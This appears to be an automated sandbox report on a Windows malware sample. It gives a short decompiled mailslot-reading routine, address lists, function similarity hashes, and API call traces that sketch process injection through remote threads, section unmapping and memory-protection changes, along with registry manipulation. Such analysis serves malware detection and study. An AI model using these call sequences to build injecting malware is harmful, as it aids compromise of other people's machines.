							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
